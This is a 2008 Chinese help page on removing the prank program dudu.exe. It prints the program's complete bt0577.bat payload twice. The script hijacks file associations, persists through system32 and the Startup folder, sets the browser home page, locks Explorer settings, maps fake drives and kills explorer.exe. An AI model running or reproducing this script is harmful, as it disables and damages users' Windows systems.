恶作剧程序dudu.exe清除方法
更新时间:2008年01月16日 20:02:29 作者:
恶作剧程序dudu.exe清除方法
(福利推荐:【腾讯云】服务器最新限时优惠活动,云服务器1核2G仅99元/年、2核4G仅768元/3年,立即抢购>>>:9i0i.cn/qcloud)
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
恶作剧程序dudu.exe清除解决方案
dudu.exe运行后,当前用户临时文件夹中释放一个bt0577.bat批处理文件。这是个恶作剧程序。想办法阻止此.bat运行,用记事本打开该文件,可以看到下列内容:
@echo off
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
copy %0 "%windir%\system32\"
copy %0 "%systemdrive%"
copy %0 "%userprofile%\「开始」菜单\程序\启动\*.*"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start
Page" /t reg_sz /dhttp://www.xiaowo.net/f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v
"Default_Page_URL" /t reg_sz /dhttp://www.xiaowo.net/f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
HideClock /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
StartMenuLogOff /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
nodrives /t REG_DWORD /d 60 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewContextMenu /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoWinKeys /t REG_DWORD /d 1 /f
——————————————————————
如果bt0577.bat运行了,资源管理器进程被结束,用户只有一个空桌面可看了;文件关联被改得乱七八糟;三键调出任务管理器,重新启动资源管理器,用资源管理器查看,可见硬盘分区增加n个其实并未增加(可用PQ核实)。
此程序不能穿透影子。如果在影子中运行从恶作剧程序,重启一下就OK了。
dudu.exe运行后,当前用户临时文件夹中释放一个bt0577.bat批处理文件。这是个恶作剧程序。想办法阻止此.bat运行,用记事本打开该文件,可以看到下列内容:
@echo off
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
copy %0 "%windir%\system32\"
copy %0 "%systemdrive%"
copy %0 "%userprofile%\「开始」菜单\程序\启动\*.*"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start
Page" /t reg_sz /dhttp://www.xiaowo.net/f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v
"Default_Page_URL" /t reg_sz /dhttp://www.xiaowo.net/f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
HideClock /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
StartMenuLogOff /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
nodrives /t REG_DWORD /d 60 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewContextMenu /t REG_DWORD /d 0 /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoWinKeys /t REG_DWORD /d 1 /f
——————————————————————
如果bt0577.bat运行了,资源管理器进程被结束,用户只有一个空桌面可看了;文件关联被改得乱七八糟;三键调出任务管理器,重新启动资源管理器,用资源管理器查看,可见硬盘分区增加n个其实并未增加(可用PQ核实)。
此程序不能穿透影子。如果在影子中运行从恶作剧程序,重启一下就OK了。
相关文章
最新病毒变种sxs.exe及xeklsk.exe(柯南病毒)查杀方法
最新病毒变种sxs.exe及xeklsk.exe(柯南病毒)查杀方法...2007-02-02fjOs0r.dll、OnlO0r.dll 木马群的清除方法
fjOs0r.dll、OnlO0r.dll 木马群的清除方法...2007-09-09SREng用法简要说明图文教程(如何获得日志/删启动项目/服务/驱动/BHO等)
SREng用法简要说明图文教程(如何获得日志/删启动项目/服务/驱动/BHO等)...2007-04-04病毒Autorun.inf、pagefile.pif等的解决办法
病毒Autorun.inf、pagefile.pif等的解决办法...2007-03-03
最新评论